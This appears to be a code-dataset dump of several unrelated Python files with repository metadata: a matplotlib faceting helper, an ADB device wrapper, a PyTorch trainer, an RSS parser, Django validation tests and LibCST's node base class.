from matplotlib.ticker import MaxNLocator
# Both are necessary
x_major_locator = MaxNLocator(nbins=max_xticks)
y_major_locator = MaxNLocator(nbins=max_yticks)
for ax in self.axes.flat:
ax.xaxis.set_major_locator(x_major_locator)
ax.yaxis.set_major_locator(y_major_locator)
for tick in itertools.chain(ax.xaxis.get_major_ticks(),
ax.yaxis.get_major_ticks()):
tick.label.set_fontsize(fontsize)
return self
def map(self, func, *args, **kwargs):
"""
Apply a plotting function to each facet's subset of the data.
Parameters
----------
func : callable
A plotting function that takes data and keyword arguments. It
must plot to the currently active matplotlib Axes and take a
`color` keyword argument. If faceting on the `hue` dimension,
it must also take a `label` keyword argument.
args : strings
Column names in self.data that identify variables with data to
plot. The data for each variable is passed to `func` in the
order the variables are specified in the call.
kwargs : keyword arguments
All keyword arguments are passed to the plotting function.
Returns
-------
self : FacetGrid object
"""
plt = import_matplotlib_pyplot()
for ax, namedict in zip(self.axes.flat, self.name_dicts.flat):
if namedict is not None:
data = self.data.loc[namedict]
plt.sca(ax)
innerargs = [data[a].values for a in args]
maybe_mappable = func(*innerargs, **kwargs)
# TODO: better way to verify that an artist is mappable?
# https://stackoverflow.com/questions/33023036/is-it-possible-to-detect-if-a-matplotlib-artist-is-a-mappable-suitable-for-use-w#33023522
if (maybe_mappable and
hasattr(maybe_mappable, 'autoscale_None')):
self._mappables.append(maybe_mappable)
self._finalize_grid(*args[:2])
return self
| 35.700952 | 152 | 0.582618 |
45d446a91c84c9157024511722464ecff3899ed5 | 4,808 | py | Python | util/adb.py | Michel-14/ALAuto | 18a6e3e82ec5d3818f87697959a9ebd812203197 | [
"WTFPL"
] | 1 | 2020-04-13T03:17:04.000Z | 2020-04-13T03:17:04.000Z | util/adb.py | Michel-14/ALAuto | 18a6e3e82ec5d3818f87697959a9ebd812203197 | [
"WTFPL"
] | 1 | 2020-04-13T16:19:17.000Z | 2020-04-13T16:19:17.000Z | util/adb.py | Michel-14/ALAuto | 18a6e3e82ec5d3818f87697959a9ebd812203197 | [
"WTFPL"
] | 1 | 2020-04-13T15:54:25.000Z | 2020-04-13T15:54:25.000Z | import subprocess
from util.logger import Logger
class Adb(object):
legacy = False
service = ''
transID = ''
tcp = False
def init(self):
"""Kills and starts a new ADB server
"""
self.kill_server()
return self.start_server()
def enable_legacy(self):
"""Method to enable legacy adb usage.
"""
self.legacy = True
return
def start_server(self):
"""
Starts the ADB server and makes sure the android device (emulator) is attached.
Returns:
(boolean): True if everything is ready, False otherwise.
"""
cmd = ['adb', 'start-server']
subprocess.call(cmd)
""" hooking onto here, previous implementation of get-state
is pointless since the script kills the ADB server in advance,
now seperately connect via usb or tcp, tcp variable is set by main script"""
if self.tcp:
return self.connect_tcp()
else:
return self.connect_usb()
def connect_tcp(self):
cmd = ['adb', 'connect', self.service]
response = subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode('utf-8')
if (response.find('connected') == 0) or (response.find('already') == 0):
self.assign_serial()
if (self.transID is not None) and self.transID:
return True
Logger.log_error('Failure to assign transport_id.')
Logger.log_error('Please try updating your ADB installation. Current ADB version:')
self.print_adb_version()
return False
def connect_usb(self):
self.assign_serial()
if (self.transID is not None) and self.transID:
cmd = ['adb', '-t', self.transID, 'wait-for-device']
Logger.log_msg('Waiting for device [' + self.service + '] to be authorized...')
subprocess.call(cmd)
Logger.log_msg('Device [' + self.service + '] authorized and connected.')
return True
Logger.log_error('Failure to assign transport_id. Is your device connected? Or is "transport_id" not supported in current ADB version? ')
Logger.log_error('Try updating ADB if "transport_id:" does not exist in the info of your device when running "adb devices -l" in cmd.')
Logger.log_error('Current ADB version:')
self.print_adb_version()
return False
@staticmethod
def kill_server():
"""Kills the ADB server
"""
cmd = ['adb', 'kill-server']
subprocess.call(cmd)
@staticmethod
def exec_out(args):
"""Executes the command via exec-out
Args:
args (string): Command to execute.
Returns:
tuple: A tuple containing stdoutdata and stderrdata
"""
cmd = ['adb', '-t', Adb.transID , 'exec-out'] + args.split(' ')
process = subprocess.Popen(cmd, stdout = subprocess.PIPE)
return process.communicate()[0]
@staticmethod
def push(args):
"""Executes the command to push a file via adb
Args:
args (string): Command to execute.
"""
cmd = ['adb', '-t', Adb.transID ,'push'] + args.split(' ')
Logger.log_debug(str(cmd))
subprocess.call(cmd)
@staticmethod
def shell(args):
"""Executes the command via adb shell
Args:
args (string): Command to execute.
"""
cmd = ['adb', '-t', Adb.transID ,'shell'] + args.split(' ')
Logger.log_debug(str(cmd))
process = subprocess.Popen(cmd, stdout = subprocess.PIPE)
return process.communicate()[0]
@classmethod
def assign_serial(cls):
cmd = ['adb', 'devices', '-l']
response = subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode('utf-8').splitlines()
cls.sanitize_device_info(response)
if not response:
Logger.log_error('adb devices -l yielded no lines with "transport_id:"')
cls.transID = cls.get_serial_trans(cls.service, response)
@staticmethod
def sanitize_device_info(string_list):
for index in range(len(string_list) - 1, -1, -1):
if 'transport_id:' not in string_list[index]:
string_list.pop(index)
@staticmethod
def get_serial_trans(device, string_list):
for index in range(len(string_list)):
if device in string_list[index]:
return string_list[index][string_list[index].index('transport_id:') + 13:]
@staticmethod
def print_adb_version():
cmd = ['adb', '--version']
response = subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode('utf-8').splitlines()
for version in response:
Logger.log_error(version)
| 34.589928 | 145 | 0.598586 |
1a6cbd2890d5723dd74141463397f427ffbf3f8d | 5,993 | py | Python | model_training/unet_addnet/trainer.py | ostapViniavskyi/brain_tumor_segmentation | c367155bd8eb3e4f950da824385641d2dc8c063a | [
"MIT"
] | 7 | 2019-12-18T20:07:03.000Z | 2021-04-28T09:19:11.000Z | model_training/unet_addnet/trainer.py | ostapViniavskyi/brain_tumor_segmentation | c367155bd8eb3e4f950da824385641d2dc8c063a | [
"MIT"
] | null | null | null | model_training/unet_addnet/trainer.py | ostapViniavskyi/brain_tumor_segmentation | c367155bd8eb3e4f950da824385641d2dc8c063a | [
"MIT"
] | 1 | 2022-01-17T11:21:50.000Z | 2022-01-17T11:21:50.000Z | import numpy as np
import torch
import torch.optim as optim
import tqdm
import time
import os
from collections import defaultdict
from tensorboardX import SummaryWriter
from model_training.common.losses import get_loss
from model_training.common.metrics import get_metric
class Trainer:
def __init__(self, model, config, train_dl, val_dl, device):
self.model = model
self.config = config
self.train_dl = train_dl
self.val_dl = val_dl
self.device = device
if not os.path.exists(config["log_path"]):
os.mkdir(config["log_path"])
def train(self):
self._init_params()
for epoch in range(self.epochs):
train_loss = self._run_epoch(epoch)
val_loss, metrics = self._validate()
self.scheduler.step(val_loss)
self._set_checkpoint(val_loss)
print(f"\nEpoch: {epoch}; train loss = {train_loss}; validation loss = {val_loss}")
self._write_to_tensorboard(epoch, train_loss, val_loss, metrics)
def _save_checkpoint(self, file_prefix):
torch.save(
{
'model': self.model.state_dict()
},
os.path.join(self.log_path, '{}.h5'.format(file_prefix)))
def _set_checkpoint(self, val_loss):
""" Saves model weights in the last checkpoint.
Also, model is saved as the best model if model has the best loss
"""
if val_loss < self.best_loss:
self.best_loss = val_loss
self._save_checkpoint(file_prefix='best')
self._save_checkpoint(file_prefix='last')
def _init_params(self):
self.epochs = self.config["num_epochs"]
self.criterion = get_loss(self.config['loss'])
self.optimizer = self._get_optimizer()
self.scheduler = self._get_scheduler()
self.metrics = {metric_name: get_metric(metric_name, device=self.device) for metric_name in
self.config["metrics"]}
self.log_path = os.path.join(self.config['log_path'], f'train-{time.time()}')
os.mkdir(self.log_path)
self.writer = SummaryWriter(self.log_path)
self.best_loss = float("inf")
self.model.to(self.device)
def _run_epoch(self, epoch):
self.model.train()
losses = []
lr = self.optimizer.param_groups[0]['lr']
status_bar = tqdm.tqdm(total=len(self.train_dl))
status_bar.set_description(f'Epoch {epoch}, lr {lr}')
for X, y in self.train_dl:
self.model.zero_grad()
X, y = X.to(self.device), y.to(self.device)
y_pred, _ = self.model(X)
loss = self.criterion(y_pred, y)
loss.backward()
self.optimizer.step()
losses.append(loss.item())
status_bar.update()
status_bar.set_postfix(loss=losses[-1])
status_bar.close()
return np.mean(losses)
def _validate(self):
self.model.eval()
losses, metrics = [], defaultdict(list)
status_bar = tqdm.tqdm(total=len(self.val_dl))
with torch.no_grad():
for X, y in self.val_dl:
X, y = X.to(self.device), y.to(self.device)
y_pred, _ = self.model(X)
loss = self.criterion(y_pred, y)
losses.append(loss.item())
for metric_name in self.metrics:
metrics[metric_name].append(self.metrics[metric_name](y_pred, y))
status_bar.update()
status_bar.set_postfix(loss=losses[-1])
status_bar.close()
return np.mean(losses), dict(zip(metrics.keys(), map(np.mean, metrics.values())))
def _get_scheduler(self):
""" Creates scheduler for a given optimizer from Trainer config
Returns:
torch.optim.lr_scheduler._LRScheduler: optimizer scheduler
"""
scheduler_config = self.config['scheduler']
if scheduler_config['name'] == 'plateau':
scheduler = optim.lr_scheduler.ReduceLROnPlateau(self.optimizer,
mode=scheduler_config['mode'],
patience=scheduler_config['patience'],
factor=scheduler_config['factor'],
min_lr=scheduler_config['min_lr'])
else:
raise ValueError(f"Scheduler [{scheduler_config['name']}] not recognized.")
return scheduler
def _get_optimizer(self):
""" Creates model optimizer from Trainer config
Returns:
torch.optim.optimizer.Optimizer: model optimizer
"""
optimizer_config = self.config['optimizer']
params = self._get_params()
if optimizer_config['name'] == 'adam':
optimizer = optim.Adam(params, lr=optimizer_config['lr'],
weight_decay=optimizer_config.get('weight_decay', 0))
elif optimizer_config['name'] == 'sgd':
optimizer = optim.SGD(params,
lr=optimizer_config['lr'],
momentum=optimizer_config.get('momentum', 0),
weight_decay=optimizer_config.get('weight_decay', 0))
else:
raise ValueError(f"Optimizer [{optimizer_config['name']}] not recognized.")
return optimizer
def _write_to_tensorboard(self, epoch, train_loss, val_loss, val_metrics):
for scalar_prefix, loss in zip(('Validation', 'Train'), (train_loss, val_loss)):
self.writer.add_scalar(f'{scalar_prefix}_Loss', loss, epoch)
for metric_name in val_metrics:
self.writer.add_scalar(f'Validation_{metric_name}', val_metrics[metric_name], epoch)
def _get_params(self):
return self.model.parameters()
| 35.886228 | 99 | 0.581345 |
8aa2aa527c8b0a2dd0a1e38f623be6bbda666dff | 721 | py | Python | WebMirror/management/rss_parser_funcs/feed_parse_extractVentifrappeWordpressCom.py | fake-name/ReadableWebProxy | ed5c7abe38706acc2684a1e6cd80242a03c5f010 | [
"BSD-3-Clause"
] | 193 | 2016-08-02T22:04:35.000Z | 2022-03-09T20:45:41.000Z | WebMirror/management/rss_parser_funcs/feed_parse_extractVentifrappeWordpressCom.py | fake-name/ReadableWebProxy | ed5c7abe38706acc2684a1e6cd80242a03c5f010 | [
"BSD-3-Clause"
] | 533 | 2016-08-23T20:48:23.000Z | 2022-03-28T15:55:13.000Z | WebMirror/management/rss_parser_funcs/feed_parse_extractVentifrappeWordpressCom.py | rrosajp/ReadableWebProxy | ed5c7abe38706acc2684a1e6cd80242a03c5f010 | [
"BSD-3-Clause"
] | 19 | 2015-08-13T18:01:08.000Z | 2021-07-12T17:13:09.000Z | def extractVentifrappeWordpressCom(item):
'''
Parser for 'ventifrappe.wordpress.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
titlemap = [
('Doctoring the world Chapter ', 'Doctoring the world', 'translated'),
('Doctoring the world: Chapter ', 'Doctoring the world', 'translated'),
('Master of Dungeon', 'Master of Dungeon', 'oel'),
]
for titlecomponent, name, tl_type in titlemap:
if titlecomponent.lower() in item['title'].lower():
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False | 34.333333 | 104 | 0.675451 |
c6c7a51e7c4881e764a8d572e670b3cfa744175f | 8,687 | py | Python | mkt/developers/tests/test_views_validation.py | ngokevin/zamboni | a33dcd489175d8e7ba1c02ee4dabb6cfdc405e69 | [
"BSD-3-Clause"
] | null | null | null | mkt/developers/tests/test_views_validation.py | ngokevin/zamboni | a33dcd489175d8e7ba1c02ee4dabb6cfdc405e69 | [
"BSD-3-Clause"
] | null | null | null | mkt/developers/tests/test_views_validation.py | ngokevin/zamboni | a33dcd489175d8e7ba1c02ee4dabb6cfdc405e69 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import codecs
import collections
import json
import os
import tempfile
from django import forms
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from mock import Mock, patch
from nose.tools import eq_
from pyquery import PyQuery as pq
from test_utils import RequestFactory
import amo
import amo.tests
from amo.tests.test_helpers import get_image_path
from mkt.developers.views import standalone_hosted_upload, trap_duplicate
from mkt.files.helpers import copyfileobj
from mkt.files.models import FileUpload
from mkt.files.tests.test_models import UploadTest as BaseUploadTest
from mkt.files.utils import WebAppParser
from mkt.site.fixtures import fixture
from mkt.submit.tests.test_views import BaseWebAppTest
from mkt.users.models import UserProfile
class TestWebApps(amo.tests.TestCase, amo.tests.AMOPaths):
def setUp(self):
self.webapp_path = tempfile.mktemp(suffix='.webapp')
with storage.open(self.webapp_path, 'wb') as f:
copyfileobj(open(os.path.join(os.path.dirname(__file__),
'addons', 'mozball.webapp')),
f)
self.tmp_files = []
self.manifest = dict(name=u'Ivan Krsti\u0107', version=u'1.0',
description=u'summary',
developer=dict(name=u'Dev Namé'))
def tearDown(self):
for tmp in self.tmp_files:
storage.delete(tmp)
def webapp(self, data=None, contents='', suffix='.webapp'):
tmp = tempfile.mktemp(suffix=suffix)
self.tmp_files.append(tmp)
with storage.open(tmp, 'wb') as f:
f.write(json.dumps(data) if data else contents)
return tmp
def test_parse(self):
wp = WebAppParser().parse(self.webapp_path)
eq_(wp['guid'], None)
eq_(wp['description']['en-US'], u'Exciting Open Web development action!')
# UTF-8 byte string decoded to unicode.
eq_(wp['description']['es'],
u'\xa1Acci\xf3n abierta emocionante del desarrollo del Web!')
eq_(wp['description']['it'],
u'Azione aperta emozionante di sviluppo di fotoricettore!')
eq_(wp['version'], '1.0')
eq_(wp['default_locale'], 'en-US')
def test_parse_packaged(self):
wp = WebAppParser().parse(self.packaged_app_path('mozball.zip'))
eq_(wp['guid'], None)
eq_(wp['name']['en-US'], u'Packaged MozillaBall ょ')
eq_(wp['description']['en-US'], u'Exciting Open Web development action!')
eq_(wp['description']['es'],
u'¡Acción abierta emocionante del desarrollo del Web!')
eq_(wp['description']['it'],
u'Azione aperta emozionante di sviluppo di fotoricettore!')
eq_(wp['version'], '1.0')
eq_(wp['default_locale'], 'en-US')
def test_parse_packaged_BOM(self):
wp = WebAppParser().parse(self.packaged_app_path('mozBOM.zip'))
eq_(wp['guid'], None)
eq_(wp['name']['en-US'], u'Packaged MozBOM ょ')
eq_(wp['description']['en-US'], u'Exciting BOM action!')
eq_(wp['description']['es'], u'¡Acción BOM!')
eq_(wp['description']['it'], u'Azione BOM!')
eq_(wp['version'], '1.0')
eq_(wp['default_locale'], 'en-US')
def test_no_manifest_at_root(self):
with self.assertRaises(forms.ValidationError) as exc:
WebAppParser().parse(
self.packaged_app_path('no-manifest-at-root.zip'))
m = exc.exception.messages[0]
assert m.startswith('The file "manifest.webapp" was not found'), (
'Unexpected: %s' % m)
def test_no_locales(self):
wp = WebAppParser().parse(self.webapp(dict(name='foo', version='1.0',
description='description',
developer=dict(name='bar'))))
eq_(wp['description']['en-US'], u'description')
def test_no_description(self):
wp = WebAppParser().parse(self.webapp(dict(name='foo',
version='1.0',
developer=dict(name='bar'))))
eq_(wp['description'], {})
def test_syntax_error(self):
with self.assertRaises(forms.ValidationError) as exc:
WebAppParser().parse(self.webapp(contents='}]'))
m = exc.exception.messages[0]
assert m.startswith('The webapp manifest is not valid JSON.'), (
'Unexpected: %s' % m)
def test_utf8_bom(self):
wm = codecs.BOM_UTF8 + json.dumps(self.manifest, encoding='utf8')
wp = WebAppParser().parse(self.webapp(contents=wm))
eq_(wp['version'], '1.0')
def test_non_ascii(self):
wm = json.dumps(dict(name=u'まつもとゆきひろ', version='1.0',
developer=dict(name=u'まつもとゆきひろ')),
encoding='shift-jis')
wp = WebAppParser().parse(self.webapp(contents=wm))
eq_(wp['name'], {'en-US': u'まつもとゆきひろ'})
class TestTrapDuplicate(BaseWebAppTest):
def setUp(self):
super(TestTrapDuplicate, self).setUp()
self.create_switch('webapps-unique-by-domain')
self.req = RequestFactory().get('/')
self.req.user = UserProfile.objects.get(pk=999)
@patch('mkt.developers.views.trap_duplicate')
def test_trap_duplicate_skipped_on_standalone(self, trap_duplicate_mock):
self.post()
standalone_hosted_upload(self.req)
assert not trap_duplicate_mock.called
def test_trap_duplicate(self):
self.post_addon()
standalone_hosted_upload(self.req)
assert trap_duplicate(self.req, 'http://allizom.org/mozball.webapp')
class TestStandaloneValidation(BaseUploadTest):
fixtures = fixture('user_999')
def setUp(self):
super(TestStandaloneValidation, self).setUp()
assert self.client.login(username='regular@mozilla.com',
password='password')
# Upload URLs
self.hosted_upload = reverse(
'mkt.developers.standalone_hosted_upload')
self.packaged_upload = reverse(
'mkt.developers.standalone_packaged_upload')
def hosted_detail(self, uuid):
return reverse('mkt.developers.standalone_upload_detail',
args=['hosted', uuid])
def packaged_detail(self, uuid):
return reverse('mkt.developers.standalone_upload_detail',
args=['packaged', uuid])
def upload_detail(self, uuid):
return reverse('mkt.developers.upload_detail', args=[uuid])
def test_context(self):
res = self.client.get(reverse('mkt.developers.validate_app'))
eq_(res.status_code, 200)
doc = pq(res.content)
eq_(doc('#upload-webapp-url').attr('data-upload-url'),
self.hosted_upload)
eq_(doc('#upload-app').attr('data-upload-url'), self.packaged_upload)
def detail_view(self, url_factory, upload):
res = self.client.get(url_factory(upload.uuid))
res_json = json.loads(res.content)
eq_(res_json['url'], url_factory(upload.uuid))
eq_(res_json['full_report_url'], self.upload_detail(upload.uuid))
res = self.client.get(self.upload_detail(upload.uuid))
eq_(res.status_code, 200)
doc = pq(res.content)
assert doc('header h1').text().startswith('Validation Results for ')
suite = doc('#addon-validator-suite')
# All apps have a `validateurl` value that corresponds to a hosted app.
eq_(suite.attr('data-validateurl'), self.hosted_detail(upload.uuid))
@patch('mkt.developers.tasks._fetch_manifest')
def test_hosted_detail(self, fetch_manifest):
def update_upload(url, upload):
with open(os.path.join(os.path.dirname(__file__),
'addons', 'mozball.webapp'), 'r') as data:
return data.read()
fetch_manifest.side_effect = update_upload
res = self.client.post(
self.hosted_upload, {'manifest': 'http://foo.bar/'}, follow=True)
eq_(res.status_code, 200)
uuid = json.loads(res.content)['upload']
upload = FileUpload.objects.get(uuid=uuid)
eq_(upload.user.pk, 999)
self.detail_view(self.hosted_detail, upload)
def test_packaged_detail(self):
data = open(get_image_path('animated.png'), 'rb')
self.client.post(self.packaged_upload, {'upload': data})
upload = FileUpload.objects.get(name='animated.png')
self.detail_view(self.packaged_detail, upload)
| 39.666667 | 81 | 0.620237 |
b01f811f3466a5ad6e740310328ee16156794479 | 17,073 | py | Python | libcst/_nodes/base.py | chrahunt/LibCST | c92bc02d8c167e0f0a27c822f111d5e14f8545ec | [
"Apache-2.0"
] | null | null | null | libcst/_nodes/base.py | chrahunt/LibCST | c92bc02d8c167e0f0a27c822f111d5e14f8545ec | [
"Apache-2.0"
] | null | null | null | libcst/_nodes/base.py | chrahunt/LibCST | c92bc02d8c167e0f0a27c822f111d5e14f8545ec | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from abc import ABC, abstractmethod
from copy import deepcopy
from dataclasses import dataclass, field, fields, replace
from typing import (
TYPE_CHECKING,
Any,
Dict,
List,
MutableMapping,
Sequence,
Type,
TypeVar,
Union,
cast,
)
from libcst._nodes.internal import CodegenState, CodePosition, CodeRange
from libcst._removal_sentinel import RemovalSentinel
from libcst._type_enforce import is_value_of_type
from libcst._types import CSTNodeT
from libcst._visitors import CSTTransformer, CSTVisitor, CSTVisitorT
if TYPE_CHECKING:
from libcst.metadata.base_provider import BaseMetadataProvider # noqa: F401
_T = TypeVar("_T")
_CSTMetadataMapping = MutableMapping[Type["BaseMetaDataProvider[_T]"], _T]
_CSTNodeSelfT = TypeVar("_CSTNodeSelfT", bound="CSTNode")
_EMPTY_SEQUENCE: Sequence["CSTNode"] = ()
class CSTValidationError(SyntaxError):
pass
class CSTCodegenError(SyntaxError):
pass
class _ChildrenCollectionVisitor(CSTVisitor):
def __init__(self) -> None:
self.children: List[CSTNode] = []
def on_visit(self, node: "CSTNode") -> bool:
self.children.append(node)
return False # Don't include transitive children
class _ChildrenReplacementTransformer(CSTTransformer):
def __init__(
self, old_node: "CSTNode", new_node: Union["CSTNode", RemovalSentinel]
) -> None:
self.old_node = old_node
self.new_node = new_node
def on_visit(self, node: "CSTNode") -> bool:
# If the node is one we are about to replace, we shouldn't
# recurse down it, that would be a waste of time.
return node is not self.old_node
def on_leave(
self, original_node: "CSTNode", updated_node: "CSTNode"
) -> Union["CSTNode", RemovalSentinel]:
if original_node is self.old_node:
return self.new_node
return updated_node
class _NOOPVisitor(CSTTransformer):
pass
def _pretty_repr(value: object) -> str:
if not isinstance(value, str) and isinstance(value, Sequence):
return _pretty_repr_sequence(value)
else:
return repr(value)
def _pretty_repr_sequence(seq: Sequence[object]) -> str:
if len(seq) == 0:
return "[]"
else:
return "\n".join(["[", *[f"{_indent(repr(el))}," for el in seq], "]"])
def _indent(value: str) -> str:
return "\n".join(f" {l}" for l in value.split("\n"))
@dataclass(frozen=True)
class CSTNode(ABC):
def __post_init__(self) -> None:
# PERF: It might make more sense to move validation work into the visitor, which
# would allow us to avoid validating the tree when parsing a file.
self._validate()
@classmethod
def __init_subclass__(cls, **kwargs: Any) -> None:
"""
HACK: Add our implementation of `__repr__`, `__hash__`, and `__eq__` to the
class's __dict__ to prevent dataclass from generating it's own `__repr__`,
`__hash__`, and `__eq__`.
The alternative is to require each implementation of a node to remember to add
`repr=False, eq=False`, which is more error-prone.
"""
super().__init_subclass__(**kwargs)
if "__repr__" not in cls.__dict__:
cls.__repr__ = CSTNode.__repr__
if "__eq__" not in cls.__dict__:
cls.__eq__ = CSTNode.__eq__
if "__hash__" not in cls.__dict__:
cls.__hash__ = CSTNode.__hash__
def _validate(self) -> None:
"""
Override this to perform runtime validation of a newly created node.
The function is called during `__init__`. It should check for possible mistakes
that wouldn't be caught by a static type checker.
If you can't use a static type checker, and want to perform a runtime validation
of this node's types, use `validate_types` instead.
"""
pass
def validate_types_shallow(self) -> None:
"""
Compares the type annotations on a node's fields with those field's actual
values at runtime. Raises a TypeError is a mismatch is found.
Only validates the current node, not any of it's children. For a recursive
version, see :func:`validate_types_deep`.
If you're using a static type checker (highly recommended), this is useless.
However, if your code doesn't use a static type checker, or if you're unable to
statically type your code for some reason, you can use this method to help
validate your tree.
Some (non-typing) validation is done unconditionally during the construction of
a node. That validation does not overlap with the work that
:func:`validate_types_deep` does.
"""
for f in fields(self):
value = getattr(self, f.name)
if not is_value_of_type(value, f.type):
raise TypeError(
f"Expected an instance of {f.type!r} on "
+ f"{type(self).__name__}'s '{f.name}' field, but instead got "
+ f"an instance of {type(value)!r}"
)
def validate_types_deep(self) -> None:
"""
Like :func:`validate_types_shallow`, but recursively validates the whole tree.
"""
self.validate_types_shallow()
for ch in self.children:
ch.validate_types_deep()
@property
def children(self) -> Sequence["CSTNode"]:
"""
The immediate (not transitive) child CSTNodes of the current node. Various
properties on the nodes, such as string values, will not be visited if they are
not a subclass of CSTNode.
Iterable properties of the node (e.g. an IndentedBlock's body) will be flattened
into the children's sequence.
The children will always be returned in the same order that they appear
lexically in the code.
"""
# We're hooking into _visit_and_replace_children, which means that our current
# implementation is slow. We may need to rethink and/or cache this if it becomes
# a frequently accessed property.
#
# This probably won't be called frequently, because most child access will
# probably through visit, or directly through named property access, not through
# children.
visitor = _ChildrenCollectionVisitor()
self._visit_and_replace_children(visitor)
return visitor.children
def visit(
self: _CSTNodeSelfT, visitor: CSTVisitorT
) -> Union[_CSTNodeSelfT, RemovalSentinel]:
"""
Visits the current node, its children, and all transitive children using
the given visitor's callbacks.
"""
# visit self
should_visit_children = visitor.on_visit(self)
# TODO: provide traversal where children are not replaced
# visit children (optionally)
if should_visit_children:
# It's not possible to define `_visit_and_replace_children` with the correct
# return type in any sane way, so we're using this cast. See the
# explanation above the declaration of `_visit_and_replace_children`.
with_updated_children = cast(
_CSTNodeSelfT, self._visit_and_replace_children(visitor)
)
else:
with_updated_children = self
if isinstance(visitor, CSTVisitor):
visitor.on_leave(self)
leave_result = self
else:
leave_result = visitor.on_leave(self, with_updated_children)
# validate return type of the user-defined `visitor.on_leave` method
if not isinstance(leave_result, (CSTNode, RemovalSentinel)):
raise Exception(
f"Expected a node of type CSTNode or a RemovalSentinel, "
+ f"but got a return value of {type(leave_result).__name__}"
)
# TODO: Run runtime typechecks against updated nodes
return leave_result
# The return type of `_visit_and_replace_children` is `CSTNode`, not
# `_CSTNodeSelfT`. This is because pyre currently doesn't have a way to annotate
# classes as final. https://mypy.readthedocs.io/en/latest/final_attrs.html
#
# The issue is that any reasonable implementation of `_visit_and_replace_children`
# needs to refer to the class' own constructor:
#
# class While(CSTNode):
# def _visit_and_replace_children(self, visitor: CSTVisitorT) -> While:
# return While(...)
#
# You'll notice that because this implementation needs to call the `While`
# constructor, the return type is also `While`. This function is a valid subtype of
# `Callable[[CSTVisitorT], CSTNode]`.
#
# It is not a valid subtype of `Callable[[CSTVisitorT], _CSTNodeSelfT]`. That's
# because the return type of this function wouldn't be valid for any subclasses.
# In practice, that's not an issue, because we don't have any subclasses of `While`,
# but there's no way to tell pyre that without a `@final` annotation.
#
# Instead, we're just relying on an unchecked call to `cast()` in the `visit`
# method.
@abstractmethod
def _visit_and_replace_children(self, visitor: CSTVisitorT) -> "CSTNode":
"""
Intended to be overridden by subclasses to provide a low-level hook for the
visitor API.
Don't call this directly. Instead, use `visitor.visit_and_replace_node` or
`visitor.visit_and_replace_module`. If you need list of children, access the
`children` property instead.
The general expectation is that children should be visited in the order in which
they appear lexically.
"""
...
def _is_removable(self) -> bool:
"""
Intended to be overridden by nodes that will be iterated over inside
Module and IndentedBlock. Returning true signifies that this node is
essentially useless and can be dropped when doing a visit across it.
"""
return False
@abstractmethod
def _codegen_impl(self, state: CodegenState) -> None:
...
def _codegen(self, state: CodegenState, **kwargs: Any) -> None:
start = CodePosition(state.line, state.column)
self._codegen_impl(state, **kwargs)
end = CodePosition(state.line, state.column)
state.record_position(self, CodeRange(start, end))
def with_changes(self: _CSTNodeSelfT, **changes: Any) -> _CSTNodeSelfT:
"""
A convenience method for performing mutation-like operations on immutable nodes.
Creates a new object of the same type, replacing fields with values from the
supplied keyword arguments.
For example, to update the test of an if conditional, you could do::
def leave_If(self, original_node: cst.If, updated_node: cst.If) -> cst.If:
new_node = updated_node.with_changes(test=new_conditional)
return new_node
``new_node`` will have the same ``body``, ``orelse``, and whitespace fields as
``updated_node``, but with the updated ``test`` field.
The accepted arguments match the arguments given to ``__init__``, however there
are no required or positional arguments.
TODO: This API is untyped. There's probably no sane way to type it using pyre's
current feature-set, but we should still think about ways to type this or a
similar API in the future.
"""
return replace(self, **changes)
def deep_clone(self: _CSTNodeSelfT) -> _CSTNodeSelfT:
"""
Recursively clone the entire tree. The created tree is a new tree has the same
representation but different identity.
>>> tree = cst.parse_expression("1+2")
>>> tree.deep_clone() == tree
False
>>> tree == tree
True
>>> tree.deep_equals(tree.deep_clone())
True
"""
cloned_fields: Dict[str, object] = {}
for field in fields(self):
key = field.name
if key[0] == "_":
continue
val = getattr(self, key)
# We can't use isinstance(val, CSTNode) here due to poor performance
# of isinstance checks against ABC direct subclasses. What we're trying
# to do here is recursively call this functionality on subclasses, but
# if the attribute isn't a CSTNode, fall back to copy.deepcopy.
try:
cloned_fields[key] = val.deep_clone()
except AttributeError:
cloned_fields[key] = deepcopy(val)
return type(self)(**cloned_fields)
def deep_equals(self, other: "CSTNode") -> bool:
"""
Recursively inspects the entire tree under ``self`` and ``other`` to determine if
the two trees are equal by representation instead of identity (``==``).
"""
from libcst._nodes.deep_equals import deep_equals as deep_equals_impl
return deep_equals_impl(self, other)
def deep_replace(
self: _CSTNodeSelfT, old_node: "CSTNode", new_node: CSTNodeT
) -> Union[_CSTNodeSelfT, CSTNodeT]:
"""
Recursively replaces any instance of ``old_node`` with ``new_node`` by identity.
Use this to avoid nested ``with_changes`` blocks when you are replacing one of
a node's deep children with a new node. Note that if you have previously
modified the tree in a way that ``old_node`` appears more than once as a deep
child, all instances will be replaced.
"""
new_tree = self.visit(_ChildrenReplacementTransformer(old_node, new_node))
if isinstance(new_tree, RemovalSentinel):
# The above transform never returns RemovalSentinel, so this isn't possible
raise Exception("Logic error, cannot get a RemovalSentinel here!")
return new_tree
def deep_remove(
self: _CSTNodeSelfT, old_node: "CSTNode"
) -> Union[_CSTNodeSelfT, RemovalSentinel]:
"""
Recursively removes any instance of ``old_node`` by identity. Note that if you
have previously modified the tree in a way that ``old_node`` appears more than
once as a deep child, all instances will be removed.
"""
return self.visit(
_ChildrenReplacementTransformer(old_node, RemovalSentinel.REMOVE)
)
def __eq__(self: _CSTNodeSelfT, other: _CSTNodeSelfT) -> bool:
"""
CSTNodes are only treated as equal by identity. This matches the behavior of
CPython's AST nodes.
If you actually want to compare the value instead of the identity of the current
node with another, use `node.deep_equals`. Because `deep_equals` must traverse
the entire tree, it can have an unexpectedly large time complexity.
We're not exposing value equality as the default behavior because of
`deep_equals`'s large time complexity.
"""
return self is other
def __hash__(self) -> int:
# Equality of nodes is based on identity, so the hash should be too.
return id(self)
def __repr__(self) -> str:
if len(fields(self)) == 0:
return f"{type(self).__name__}()"
lines = [f"{type(self).__name__}("]
for f in fields(self):
key = f.name
